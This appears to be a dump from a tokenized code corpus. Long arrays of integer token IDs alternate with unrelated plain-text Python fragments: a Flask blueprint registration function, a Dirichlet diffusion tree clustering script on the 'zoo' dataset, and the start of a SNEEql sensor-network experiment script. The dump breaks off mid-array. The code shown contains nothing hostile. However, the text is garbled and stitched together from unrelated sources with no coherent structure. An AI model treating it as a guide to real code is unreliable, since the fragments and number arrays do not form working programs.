7222,
585,
17540,
25,
37902,
4663,
891,
220,
1303,
317,
900,
286,
22715,
4634,
262,
11637,
286,
257,
4903,
2117,
34961,
1989,
973,
329,
25352,
262,
2223,
286,
262,
14330,
13,
383,
22715,
17191,
2291,
890,
3984,
290,
32477,
11,
484,
26720,
2291,
20334,
290,
262,
4903,
375,
5139,
4818,
388,
13,
198,
220,
220,
220,
1104,
25,
37902,
4663,
891,
220,
1303,
383,
7561,
318,
284,
307,
4855,
355,
636,
286,
262,
2450,
784,
290,
262,
2450,
3793,
4938,
13,
198,
220,
220,
220,
1080,
25,
37902,
4663,
891,
220,
1303,
1052,
5174,
14492,
1080,
973,
329,
25352,
262,
2223,
286,
262,
14330,
13,
198,
220,
220,
220,
1080,
24728,
25,
37902,
4663,
891,
220,
1303,
1052,
5174,
14492,
1080,
393,
14492,
3335,
973,
329,
25352,
262,
2223,
286,
262,
14330,
13,
198,
220,
220,
220,
640,
9492,
2100,
25,
37902,
4663,
891,
220,
1303,
317,
24824,
2278,
286,
640,
878,
262,
1306,
9706,
286,
262,
2223,
286,
262,
14330,
13,
6498,
1515,
392,
1988,
17191,
307,
281,
2124,
21282,
25,
32257,
355,
5447,
416,
16410,
19875,
15952,
2611,
1157,
12,
17,
60,
4083,
198,
220,
220,
220,
4326,
5189,
12332,
25,
37902,
4663,
891,
220,
1303,
383,
4326,
286,
3953,
973,
329,
14143,
262,
30632,
286,
262,
2223,
286,
262,
14330,
13,
198,
220,
220,
220,
2196,
25,
37902,
4663,
891,
220,
1303,
383,
2196,
286,
262,
2496,
31433,
13,
198,
220,
220,
220,
7166,
14749,
25,
37902,
4663,
891,
220,
1303,
1052,
5174,
4067,
286,
262,
7283,
6946,
2272,
543,
318,
5981,
329,
25352,
262,
2223,
286,
262,
14330,
13,
628,
220,
220,
220,
1303,
2638,
1378,
2503,
13,
86,
18,
13,
2398,
14,
15724,
14,
2999,
14,
8135,
418,
14,
7295,
2,
36307,
628,
220,
220,
220,
1303,
2638,
1378,
2503,
13,
86,
18,
13,
2398,
14,
15724,
14,
2999,
14,
8135,
418,
14,
7295,
2,
3103,
984,
198,
220,
220,
220,
7561,
25,
37902,
4663,
891,
220,
1303,
1052,
4905,
319,
281,
31433,
13,
198,
220,
220,
220,
12729,
25,
37902,
4663,
891,
220,
1303,
317,
7820,
326,
11455,
262,
8333,
1453,
257,
14330,
625,
281,
31433,
422,
281,
8333,
263,
13,
198,
220,
220,
220,
2195,
861,
295,
25,
37902,
4663,
891,
220,
1303,
317,
7820,
326,
29348,
257,
14330,
625,
281,
31433,
422,
4671,
13,
198,
220,
220,
220,
31433,
25,
37902,
4663,
891,
220,
1303,
317,
8271,
393,
257,
4947,
286,
4133,
326,
389,
262,
2426,
286,
257,
14330,
13,
198,
220,
220,
220,
31433,
36307,
25,
37902,
4663,
891,
220,
1303,
1052,
31433,
326,
318,
4947,
286,
1981,
4133,
198,
220,
220,
220,
31433,
43642,
25,
37902,
4663,
891,
220,
1303,
1446,
13920,
329,
31433,
41063,
14700,
13,
198,
220,
220,
220,
27863,
40596,
25,
37902,
4663,
891,
220,
1303,
16718,
284,
4474,
10064,
284,
10568,
12333,
326,
15058,
422,
262,
35981,
286,
42283,
393,
12333,
1022,
2448,
8481,
290,
1041,
3145,
1756,
287,
262,
976,
7820,
13,
198,
220,
220,
220,
1482,
2536,
2913,
25,
37902,
4663,
891,
220,
1303,
317,
25131,
5408,
326,
1006,
1127,
262,
33815,
286,
281,
7561,
290,
3615,
14,
45869,
12251,
393,
13627,
262,
3403,
9723,
284,
257,
14330,
13,
198,
220,
220,
220,
18104,
25,
37902,
4663,
891,
220,
1303,
383,
12990,
284,
1620,
281,
7561,
198,
220,
220,
220,
9578,
18843,
392,
25,
37902,
4663,
891,
220,
1303,
9578,
1515,
392,
329,
257,
32315,
5408,
13,
198,
220,
220,
220,
5972,
605,
3103,
2536,
2913,
25,
37902,
4663,
891,
220,
1303,
317,
12219,
5408,
326,
1006,
1127,
262,
33815,
286,
281,
7561,
290,
3615,
14,
45869,
12251,
393,
13627,
262,
3403,
9723,
284,
257,
14330,
13,
198,
220,
220,
220,
33085,
25,
37902,
4663,
891,
220,
1303,
317,
7820,
326,
26017,
257,
14330,
625,
281,
31433,
422,
281,
8333,
263,
13,
198,
220,
220,
220,
35946,
25,
37902,
4663,
891,
220,
1303,
35946,
329,
32315,
5408,
13,
198,
220,
220,
220,
3615,
25,
37902,
4663,
891,
220,
1303,
1052,
9312,
393,
257,
4947,
286,
12066,
326,
25340,
371,
4316,
287,
257,
14330,
13,
198,
220,
220,
220,
3615,
36307,
25,
37902,
4663,
891,
220,
1303,
317,
3615,
326,
318,
257,
1448,
286,
1981,
12066,
198,
220,
220,
220,
3615,
43642,
25,
37902,
4663,
891,
220,
1303,
1446,
13920,
329,
3615,
41063,
14700,
13,
198,
220,
220,
220,
2448,
3411,
25,
37902,
4663,
891,
220,
1303,
383,
2694,
284,
1620,
281,
7561,
625,
281,
31433,
13,
198,
220,
220,
220,
7820,
25,
37902,
4663,
891,
220,
1303,
317,
1729,
12,
28920,
1448,
286,
2448,
8481,
290,
14,
273,
1041,
3145,
1756,
13,
198,
220,
220,
220,
16777,
25,
37902,
4663,
891,
220,
1303,
317,
7820,
326,
27505,
257,
14330,
625,
281,
31433,
7268,
2614,
1321,
13,
198,
220,
220,
220,
43091,
25,
37902,
4663,
891,
220,
1303,
383,
16612,
284,
1620,
281,
7561,
625,
281,
31433,
13,
198,
220,
220,
220,
19390,
25,
37902,
4663,
891,
220,
1303,
317,
7820,
326,
26017,
257,
14330,
625,
281,
31433,
422,
281,
8333,
1453,
13,
198,
220,
220,
220,
6498,
18843,
392,
25,
37902,
4663,
891,
220,
1303,
6498,
1515,
392,
329,
32315,
5408,
13,
198,
220,
220,
220,
14330,
25,
37902,
4663,
891,
220,
1303,
1052,
12531,
3721,
326,
6870,
262,
2219,
9695,
286,
2448,
8481,
11,
1041,
3145,
1756,
11,
290,
360,
8249,
13,
198,
220,
220,
220,
5345,
25,
37902,
4663,
891,
220,
1303,
317,
7820,
326,
27505,
257,
14330,
625,
281,
31433,
13,
198,
220,
220,
220,
24014,
25,
37902,
4663,
891,
220,
1303,
317,
7820,
326,
11455,
262,
15762,
257,
14330,
625,
281,
31433,
422,
281,
8333,
263,
13,
198,
220,
220,
220,
13794,
18156,
40596,
25,
37902,
4663,
891,
220,
1303,
1148,
973,
284,
7603,
703,
284,
1104,
24439,
326,
389,
407,
636,
286,
597,
25818,
393,
7034,
287,
262,
2450,
5408,
1080,
13,
198,
220,
220,
220,
2453,
2898,
5430,
25,
37902,
4663,
891,
220,
1303,
1675,
2453,
326,
262,
779,
286,
262,
31433,
743,
307,
18283,
13,
198,
220,
220,
220,
512,
39,
420,
11649,
25,
37902,
4663,
891,
220,
1303,
383,
719,
286,
7373,
262,
11171,
284,
4671,
287,
1969,
20387,
284,
262,
4870,
13,
198,
220,
220,
220,
19406,
25,
37902,
4663,
891,
220,
1303,
1675,
779,
262,
31433,
393,
3354,
286,
340,
355,
636,
286,
257,
24185,
4947,
13,
198,
220,
220,
220,
24708,
378,
25,
37902,
4663,
891,
220,
1303,
1675,
751,
44742,
407,
602,
14,
23893,
3166,
284,
262,
31433,
1231,
30620,
262,
31433,
287,
597,
584,
835,
13,
198,
220,
220,
220,
14571,
1096,
25,
37902,
4663,
891,
220,
1303,
1675,
14571,
1096,
477,
393,
3354,
286,
262,
31433,
13,
198,
220,
220,
220,
24443,
25,
37902,
4663,
891,
220,
1303,
383,
719,
286,
4375,
284,
262,
886,
286,
281,
11171,
13,
198,
220,
220,
220,
24443,
2514,
25,
37902,
4663,
891,
220,
1303,
383,
719,
286,
598,
1571,
1366,
284,
262,
31433,
1231,
30620,
262,
31433,
287,
597,
584,
835,
13,
198,
220,
220,
220,
15424,
25,
37902,
4663,
891,
220,
1303,
1675,
3650,
262,
31433,
357,
259,
257,
1729,
12,
7645,
1153,
1296,
737,
198,
220,
220,
220,
10199,
36727,
25,
37902,
4663,
891,
220,
1303,
383,
719,
286,
5291,
262,
2450,
4003,
351,
262,
11171,
13,
198,
220,
220,
220,
10199,
7416,
25,
37902,
4663,
891,
220,
1303,
383,
719,
286,
39550,
262,
2723,
286,
262,
11171,
290,
663,
28486,
13,
198,
220,
220,
220,
11688,
25,
37902,
4663,
891,
220,
1303,
1675,
11688,
262,
779,
286,
262,
31433,
13,
198,
220,
220,
220,
5068,
1096,
25,
37902,
4663,
891,
220,
1303,
383,
719,
286,
1262,
262,
11171,
287,
257,
1597,
2858,
13,
198,
220,
220,
220,
21392,
25,
37902,
4663,
891,
220,
1303,
1675,
21392,
416,
4351,
286,
617,
2033,
286,
1988,
11,
611,
5447,
11,
329,
1262,
393,
6301,
262,
31433,
13,
198,
220,
220,
220,
24580,
11041,
25,
37902,
4663,
891,
220,
1303,
1675,
2251,
3294,
9088,
286,
262,
31433,
326,
389,
852,
47480,
973,
13,
198,
220,
220,
220,
4866,
25,
37902,
4663,
891,
220,
1303,
383,
719,
286,
1642,
281,
2748,
20728,
286,
262,
11171,
13,
198,
220,
220,
220,
4755,
25,
37902,
4663,
891,
220,
1303,
11440,
7483,
329,
262,
440,
7707,
43,
7231,
13118,
198,
220,
220,
220,
12233,
25,
37902,
4663,
891,
220,
1303,
1675,
15043,
4781,
477,
9088,
286,
262,
31433,
706,
340,
468,
587,
973,
13,
198,
220,
220,
220,
27099,
25,
37902,
4663,
891,
220,
1303,
1675,
2251,
257,
649,
27255,
31433,
422,
428,
31433,
290,
284,
4370,
393,
13096,
262,
27255,
13,
198,
220,
220,
220,
16839,
1096,
25,
37902,
4663,
891,
220,
1303,
1675,
4439,
257,
4875,
4866,
286,
357,
273,
4306,
16839,
1096,
8,
262,
31433,
422,
663,
45304,
1296,
13,
198,
220,
220,
220,
3359,
25,
37902,
4663,
891,
220,
1303,
1675,
2251,
257,
9037,
290,
32361,
40570,
286,
281,
31433,
13,
198,
220,
220,
220,
14983,
25,
37902,
4663,
891,
220,
1303,
1675,
5127,
262,
31433,
284,
2368,
12,
3911,
444,
13,
198,
220,
220,
220,
4155,
3109,
2527,
3458,
25,
37902,
4663,
891,
220,
1303,
1675,
4155,
326,
262,
14330,
319,
262,
31433,
318,
8568,
13,
198,
220,
220,
220,
12260,
25,
37902,
4663,
891,
220,
1303,
1675,
1057,
262,
3644,
1430,
31433,
13,
198,
220,
220,
220,
10784,
25,
37902,
4663,
891,
220,
1303,
383,
719,
286,
25449,
262,
11171,
656,
257,
649,
1296,
13,
198,
220,
220,
220,
7925,
25,
37902,
4663,
891,
220,
1303,
1675,
7925,
3354,
286,
262,
31433,
290,
284,
779,
340,
355,
257,
649,
31433,
13,
198,
220,
220,
220,
7925,
12441,
25,
37902,
4663,
891,
220,
1303,
383,
719,
286,
37895,
357,
35666,
12364,
8,
21588,
3435,
422,
262,
11171,
13,
198,
220,
220,
220,
7925,
9876,
25,
37902,
4663,
891,
220,
1303,
383,
719,
286,
37895,
357,
35666,
12364,
8,
21588,
5468,
422,
262,
11171,
13,
198,
220,
220,
220,
7925,
26449,
25,
37902,
4663,
891,
220,
1303,
383,
719,
286,
37895,
357,
35666,
12364,
8,
21588,
2456,
422,
262,
11171,
13,
198,
220,
220,
220,
1577,
25,
37902,
4663,
891,
220,
1303,
1675,
4351,
262,
9238,
286,
262,
31433,
284,
257,
2368,
2151,
1231,
9836,
290,
981,
34817,
262,
2656,
11171,
13,
198,
220,
220,
220,
7264,
11041,
25,
37902,
4663,
891,
220,
1303,
1675,
7264,
262,
779,
286,
262,
31433,
284,
2368,
4671,
13,
198,
220,
220,
220,
2291,
25,
37902,
4663,
891,
220,
1303,
1675,
2291,
584,
3519,
6798,
287,
262,
31433,
13,
198,
220,
220,
220,
6376,
25,
37902,
4663,
891,
220,
1303,
1675,
1700,
262,
31433,
287,
281,
6376,
13,
198,
220,
220,
220,
4175,
25,
37902,
4663,
891,
220,
1303,
1675,
4175,
326,
281,
2223,
468,
587,
6157,
319,
393,
287,
8695,
284,
262,
31433,
13,
198,
220,
220,
220,
2721,
25,
37902,
4663,
891,
220,
1303,
1675,
3440,
262,
3644,
1430,
31433,
4291,
257,
6143,
3335,
543,
3578,
5361,
393,
2491,
262,
31433,
13,
198,
220,
220,
220,
15278,
25,
37902,
4663,
891,
220,
1303,
383,
719,
286,
1642,
1695,
262,
11171,
284,
257,
2368,
12,
10608,
329,
257,
5969,
2278,
286,
640,
351,
5163,
286,
1988,
13,
198,
220,
220,
220,
22096,
25,
37902,
4663,
891,
220,
1303,
383,
719,
286,
1642,
1695,
262,
11171,
284,
257,
2368,
12,
10608,
329,
257,
5969,
2278,
286,
640,
1231,
5163,
286,
1988,
13,
198,
220,
220,
220,
5964,
25,
37902,
4663,
891,
220,
1303,
383,
719,
286,
21787,
262,
826,
284,
779,
262,
11171,
284,
257,
2368,
12,
10608,
13,
198,
220,
220,
220,
13096,
25,
37902,
4663,
891,
220,
1303,
1675,
1487,
4683,
2695,
286,
262,
31433,
13,
317,
649,
11171,
318,
407,
2727,
416,
428,
2223,
13,
198,
220,
220,
220,
1445,
25,
37902,
4663,
891,
220,
1303,
1675,
1445,
262,
31433,
422,
530,
4875,
4067,
284,
1194,
1390,
34817,
262,
2656,
4866,
13,
198,
220,
220,
220,
1306,
36727,
25,
37902,
4663,
891,
220,
1303,
1675,
7264,
262,
7368,
7820,
284,
257,
2368,
2151,
329,
511,
779,
286,
262,
31433,
13,
198,
220,
220,
220,
7330,
9444,
298,
25,
37902,
4663,
891,
220,
1303,
1675,
7330,
3326,
16823,
8281,
284,
1620,
262,
9167,
2223,
287,
8695,
284,
262,
31433,
13,
198,
220,
220,
220,
1414,
25,
37902,
4663,
891,
220,
1303,
383,
719,
286,
5989,
257,
3176,
2033,
284,
257,
2151,
329,
779,
286,
262,
11171,
13,
198,
220,
220,
220,
711,
25,
37902,
4663,
891,
220,
1303,
1675,
2251,
257,
35582,
290,
32361,
40570,
286,
281,
31433,
13,
198,
220,
220,
220,
1944,
25,
37902,
4663,
891,
220,
1303,
1675,
7271,
1620,
262,
31433,
13,
198,
220,
220,
220,
12714,
25,
37902,
4663,
891,
220,
1303,
383,
719,
286,
4955,
257,
1790,
12714,
286,
262,
11171,
13,
198,
220,
220,
220,
3601,
25,
37902,
4663,
891,
220,
1303,
1675,
2251,
257,
24607,
290,
7748,
40570,
286,
281,
31433,
13,
198,
220,
220,
220,
1100,
25,
37902,
4663,
891,
220,
1303,
1675,
7330,
1366,
422,
262,
31433,
13,
198,
220,
220,
220,
22919,
25,
37902,
4663,
891,
220,
1303,
1675,
787,
23418,
9088,
262,
31433,
287,
597,
2587,
1296,
13,
198,
220,
220,
220,
2423,
36727,
25,
37902,
4663,
891,
220,
1303,
1675,
2423,
262,
7820,
9723,
284,
262,
31433,
13,
198,
220,
220,
220,
9233,
11041,
25,
37902,
4663,
891,
220,
1303,
383,
719,
286,
1262,
262,
11171,
329,
257,
4007,
584,
621,
262,
4007,
340,
373,
5292,
329,
13,
198,
220,
220,
220,
3677,
25,
37902,
4663,
891,
220,
1303,
1675,
4351,
262,
9238,
286,
262,
31433,
284,
257,
2368,
2151,
351,
9836,
290,
981,
34817,
262,
2656,
11171,
13,
198,
220,
220,
220,
2648,
25,
37902,
4663,
891,
220,
1303,
383,
719,
286,
262,
1729,
12,
36313,
20728,
290,
6082,
286,
262,
11171,
284,
2368,
12,
3911,
444,
13,
198,
220,
220,
220,
2648,
32,
2339,
25,
37902,
4663,
891,
220,
1303,
383,
719,
286,
25950,
597,
27255,
11171,
739,
262,
976,
2846,
355,
262,
2656,
11171,
13,
198,
220,
220,
220,
4269,
25,
37902,
4663,
891,
220,
1303,
1675,
5203,
262,
31433,
287,
1103,
12,
2435,
13,
198,
220,
220,
220,
18305,
1096,
25,
37902,
4663,
891,
220,
1303,
1675,
779,
262,
31433,
287,
28805,
2316,
351,
2056,
357,
24051,
14,
41464,
8,
4847,
286,
1194,
31433,
13,
198,
220,
220,
220,
2420,
2514,
5248,
3055,
25,
37902,
4663,
891,
220,
1303,
1675,
423,
257,
2420,
31433,
1100,
503,
7812,
13,
198,
220,
220,
220,
4351,
25,
37902,
4663,
891,
220,
1303,
1675,
4351,
262,
9238,
286,
262,
31433,
287,
8939,
14834,
13,
198,
220,
220,
220,
6121,
25,
37902,
4663,
891,
220,
1303,
1675,
10385,
262,
31433,
656,
257,
1180,
5794,
13,
198,
220,
220,
220,
15772,
25,
37902,
4663,
891,
220,
1303,
1675,
15772,
262,
2656,
3288,
3303,
286,
281,
31433,
656,
1194,
3288,
3303,
13,
198,
220,
220,
220,
43194,
25,
37902,
4663,
891,
220,
1303,
1675,
555,
2220,
290,
12233,
262,
3644,
1430,
31433,
422,
257,
6143,
3335,
290,
15560,
663,
30618,
329,
4905,
13,
198,
220,
220,
220,
779,
25,
37902,
4663,
891,
220,
1303,
1675,
779,
262,
31433,
198,
220,
220,
220,
1660,
4102,
25,
37902,
4663,
891,
220,
1303,
1675,
4174,
257,
1660,
4102,
284,
262,
31433,
13,
198,
220,
220,
220,
3551,
25,
37902,
4663,
891,
220,
1303,
383,
719,
286,
3597,
284,
262,
31433,
13,
198,
220,
220,
220,
3551,
2514,
25,
37902,
4663,
891,
220,
1303,
383,
719,
286,
4375,
1366,
284,
262,
31433,
13,
628,
220,
220,
220,
1303,
48951,
1729,
12,
29412,
42814,
198,
220,
220,
220,
4808,
2302,
8847,
796,
685,
198,
220,
220,
220,
220,
220,
220,
220,
366,
392,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
366,
273,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
2673,
3103,
984,
82,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
4658,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
4658,
17227,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
562,
316,
3103,
984,
82,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
562,
316,
33553,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
562,
316,
47117,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
562,
316,
47117,
17227,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
10414,
13758,
3103,
984,
82,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
1102,
2536,
2913,
18819,
18843,
392,
17227,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
1102,
2536,
2913,
11187,
605,
18843,
1746,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
1102,
2536,
2913,
6892,
864,
18843,
2024,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
1102,
2536,
2913,
11028,
18257,
17227,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
1102,
2536,
6003,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
10378,
31023,
15156,
907,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
67,
8249,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
6404,
605,
3103,
2536,
6003,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
10608,
3103,
984,
82,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
10608,
49,
4316,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
10608,
49,
4316,
17227,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
525,
8481,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
30586,
3103,
984,
82,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
30586,
7004,
9487,
274,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
30586,
7004,
9487,
274,
17227,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
1676,
3145,
1756,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
25113,
25135,
3103,
984,
82,
1600,
198,
220,
220,
220,
2361,
628,
220,
220,
220,
4808,
8035,
796,
28531,
10223,
7203,
4023,
1378,
2503,
13,
86,
18,
13,
2398,
14,
5907,
14,
375,
45895,
14,
17,
14,
4943,
198
] | 3.491665 | 6,299 |
from flask import Flask
from app.apis.v1 import api_v1_bp
def register_blueprints(app: "Flask") -> "Flask":
"""A function to register flask blueprint.
To register blueprints add them like the example
Example usage:
from app.blueprints import blueprint
app.register_blueprint(blueprint)
Args:
app (Flask): Flask Application instance
Returns:
Flask: Flask Application instance
"""
app.register_blueprint(api_v1_bp)
return app
| [
6738,
42903,
1330,
46947,
198,
198,
6738,
598,
13,
499,
271,
13,
85,
16,
1330,
40391,
62,
85,
16,
62,
46583,
628,
198,
4299,
7881,
62,
17585,
17190,
7,
1324,
25,
366,
7414,
2093,
4943,
4613,
366,
7414,
2093,
1298,
198,
220,
220,
220,
37227,
32,
2163,
284,
7881,
42903,
30881,
13,
198,
220,
220,
220,
1675,
7881,
4171,
17190,
751,
606,
588,
262,
1672,
198,
220,
220,
220,
17934,
8748,
25,
198,
220,
220,
220,
220,
220,
220,
220,
422,
598,
13,
17585,
17190,
1330,
30881,
198,
220,
220,
220,
220,
220,
220,
220,
598,
13,
30238,
62,
17585,
4798,
7,
17585,
4798,
8,
198,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
598,
357,
7414,
2093,
2599,
46947,
15678,
4554,
628,
220,
220,
220,
16409,
25,
198,
220,
220,
220,
220,
220,
220,
220,
46947,
25,
46947,
15678,
4554,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
598,
13,
30238,
62,
17585,
4798,
7,
15042,
62,
85,
16,
62,
46583,
8,
628,
220,
220,
220,
1441,
598,
198
] | 2.785311 | 177 |
import networkx as nx
from cStringIO import StringIO
from Bio import Phylo
import matplotlib.pyplot as plt
import random
import logging
from tqdm import tqdm
logger = logging.getLogger()
logger.setLevel(logging.INFO)
import numpy as np
import trees
from trees.ddt import DirichletDiffusionTree, Inverse, GaussianLikelihoodModel
from trees.mcmc import MetropolisHastingsSampler
from trees.util import plot_tree_2d
from sklearn.decomposition import PCA
import seaborn as sns
sns.set_style('white')
import cPickle as pickle
dataset = trees.data.load('zoo')
X, y = dataset.X, dataset.y
X += np.random.normal(scale=0.01, size=X.shape)
pca = PCA(2)
pca.fit(X)
# X = pca.transform(X)
N, D = X.shape
df = Inverse(c=0.9)
lm = GaussianLikelihoodModel(sigma=np.eye(D) / 4.0, sigma0=np.eye(D) / 2.0, mu0=X.mean(axis=0)).compile()
model = DirichletDiffusionTree(df=df, likelihood_model=lm, constraints=[])
sampler = MetropolisHastingsSampler(model, X)
sampler.initialize_assignments()
likelihoods = []
fontsize = 18
| [
11748,
3127,
87,
355,
299,
87,
198,
6738,
269,
10100,
9399,
1330,
10903,
9399,
198,
6738,
16024,
1330,
1380,
2645,
78,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
11748,
4738,
198,
11748,
18931,
198,
6738,
256,
80,
36020,
1330,
256,
80,
36020,
198,
6404,
1362,
796,
18931,
13,
1136,
11187,
1362,
3419,
198,
6404,
1362,
13,
2617,
4971,
7,
6404,
2667,
13,
10778,
8,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
7150,
198,
6738,
7150,
13,
1860,
83,
1330,
36202,
488,
1616,
28813,
4241,
27660,
11,
554,
4399,
11,
12822,
31562,
7594,
11935,
17633,
198,
6738,
7150,
13,
76,
11215,
66,
1330,
3395,
25986,
39,
459,
654,
16305,
20053,
198,
6738,
7150,
13,
22602,
1330,
7110,
62,
21048,
62,
17,
67,
198,
6738,
1341,
35720,
13,
12501,
296,
9150,
1330,
4217,
32,
198,
198,
11748,
384,
397,
1211,
355,
3013,
82,
198,
198,
82,
5907,
13,
2617,
62,
7635,
10786,
11186,
11537,
198,
11748,
269,
31686,
293,
355,
2298,
293,
198,
198,
19608,
292,
316,
796,
7150,
13,
7890,
13,
2220,
10786,
89,
2238,
11537,
198,
55,
11,
331,
796,
27039,
13,
55,
11,
27039,
13,
88,
198,
55,
15853,
45941,
13,
25120,
13,
11265,
7,
9888,
28,
15,
13,
486,
11,
2546,
28,
55,
13,
43358,
8,
198,
198,
79,
6888,
796,
4217,
32,
7,
17,
8,
198,
79,
6888,
13,
11147,
7,
55,
8,
198,
198,
2,
1395,
796,
279,
6888,
13,
35636,
7,
55,
8,
198,
45,
11,
360,
796,
1395,
13,
43358,
198,
198,
7568,
796,
554,
4399,
7,
66,
28,
15,
13,
24,
8,
198,
198,
75,
76,
796,
12822,
31562,
7594,
11935,
17633,
7,
82,
13495,
28,
37659,
13,
25379,
7,
35,
8,
1220,
604,
13,
15,
11,
264,
13495,
15,
28,
37659,
13,
25379,
7,
35,
8,
1220,
362,
13,
15,
11,
38779,
15,
28,
55,
13,
32604,
7,
22704,
28,
15,
29720,
5589,
576,
3419,
198,
198,
19849,
796,
36202,
488,
1616,
28813,
4241,
27660,
7,
7568,
28,
7568,
11,
14955,
62,
19849,
28,
75,
76,
11,
17778,
41888,
12962,
198,
37687,
20053,
796,
3395,
25986,
39,
459,
654,
16305,
20053,
7,
19849,
11,
1395,
8,
198,
37687,
20053,
13,
36733,
1096,
62,
562,
570,
902,
3419,
198,
198,
2339,
11935,
82,
796,
17635,
198,
10331,
7857,
796,
1248,
198
] | 2.635417 | 384 |
#!/usr/bin/python
import getopt, logging, sys, SneeqlLib, UtilLib, AvroraLib, os, checkTupleCount
queryMap = {'Q2' : 'input/pipes/Q2.txt', 'Q4' : 'input/pipes/QNest4.txt', 'Q5' : 'input/pipes/QNest5.txt'}
networkMap = {'10' : 'input/networks/10-node-topology.xml', '30' : 'scripts/qos-exp/scenarios/30-dense-net.xml', '100' : 'scripts/qos-exp/scenarios/ix-100-dense-net.xml'}
numSourcesMap = {'10_3' : 'input/pipes/10Sites-3Sources-schemas.xml', '10_10' : 'input/pipes/10Sites-10Sources-schemas.xml', '30_min' : 'scripts/qos-exp/scenarios/30-node-min-schema.xml', '30_maj' : 'scripts/qos-exp/scenarios/30-node-maj-schema.xml', '100_min' : 'scripts/qos-exp/scenarios/100-node-min-schema.xml', '100_maj' : 'scripts/qos-exp/scenarios/100-node-maj-schema.xml'}
optGoalMap = {'min_delivery' : 'input/QoS/qos-spec-min-delivery.xml', 'min_energy' : 'input/QoS/qos-spec-min-energy.xml', 'max_lifetime' : 'input/QoS/qos-spec-max-lifetime.xml'}
optMinNN = 0
optMaxNN = 30
optSolverOutput = None
#Ouput info message to screen and logger if applicable
#Ouput warning message to screen and logger if applicable
#Ouput error message to screen and logger if applicable
if __name__ == "__main__":
main()
| [
2,
48443,
14629,
14,
8800,
14,
29412,
201,
198,
11748,
651,
8738,
11,
18931,
11,
25064,
11,
311,
21381,
13976,
25835,
11,
7273,
346,
25835,
11,
5184,
1472,
64,
25835,
11,
28686,
11,
2198,
51,
29291,
12332,
201,
198,
201,
198,
22766,
13912,
796,
1391,
6,
48,
17,
6,
1058,
705,
15414,
14,
79,
18636,
14,
48,
17,
13,
14116,
3256,
705,
48,
19,
6,
1058,
705,
15414,
14,
79,
18636,
14,
48,
45,
395,
19,
13,
14116,
3256,
705,
48,
20,
6,
1058,
705,
15414,
14,
79,
18636,
14,
48,
45,
395,
20,
13,
14116,
6,
92,
201,
198,
27349,
13912,
796,
1391,
6,
940,
6,
1058,
705,
15414,
14,
3262,
5225,
14,
940,
12,
17440,
12,
4852,
1435,
13,
19875,
3256,
705,
1270,
6,
1058,
705,
46521,
14,
80,
418,
12,
11201,
14,
1416,
268,
13010,
14,
1270,
12,
67,
1072,
12,
3262,
13,
19875,
3256,
705,
3064,
6,
1058,
705,
46521,
14,
80,
418,
12,
11201,
14,
1416,
268,
13010,
14,
844,
12,
3064,
12,
67,
1072,
12,
3262,
13,
19875,
6,
92,
201,
198,
22510,
21188,
13912,
796,
1391,
6,
940,
62,
18,
6,
1058,
705,
15414,
14,
79,
18636,
14,
940,
50,
2737,
12,
18,
21188,
12,
1416,
4411,
292,
13,
19875,
3256,
705,
940,
62,
940,
6,
1058,
705,
15414,
14,
79,
18636,
14,
940,
50,
2737,
12,
940,
21188,
12,
1416,
4411,
292,
13,
19875,
3256,
705,
1270,
62,
1084,
6,
1058,
705,
46521,
14,
80,
418,
12,
11201,
14,
1416,
268,
13010,
14,
1270,
12,
17440,
12,
1084,
12,
15952,
2611,
13,
19875,
3256,
705,
1270,
62,
76,
1228,
6,
1058,
705,
46521,
14,
80,
418,
12,
11201,
14,
1416,
268,
13010,
14,
1270,
12,
17440,
12,
76,
1228,
12,
15952,
2611,
13,
19875,
3256,
705,
3064,
62,
1084,
6,
1058,
705,
46521,
14,
80,
418,
12,
11201,
14,
1416,
268,
13010,
14,
3064,
12,
17440,
12,
1084,
12,
15952,
2611,
13,
19875,
3256,
705,
3064,
62,
76,
1228,
6,
1058,
705,
46521,
14,
80,
418,
12,
11201,
14,
1416,
268,
13010,
14,
3064,
12,
17440,
12,
76,
1228,
12,
15952,
2611,
13,
19875,
6,
92,
201,
198,
8738,
49045,
13912,
796,
1391,
6,
1084,
62,
12381,
6315,
6,
1058,
705,
15414,
14,
48,
34049,
14,
80,
418,
12,
16684,
12,
1084,
12,
12381,
6315,
13,
19875,
3256,
705,
1084,
62,
22554,
6,
1058,
705,
15414,
14,
48,
34049,
14,
80,
418,
12,
16684,
12,
1084,
12,
22554,
13,
19875,
3256,
705,
9806,
62,
36195,
8079,
6,
1058,
705,
15414,
14,
48,
34049,
14,
80,
418,
12,
16684,
12,
9806,
12,
36195,
8079,
13,
19875,
6,
92,
201,
198,
201,
198,
8738,
9452,
6144,
796,
657,
201,
198,
8738,
11518,
6144,
796,
1542,
201,
198,
8738,
50,
14375,
26410,
796,
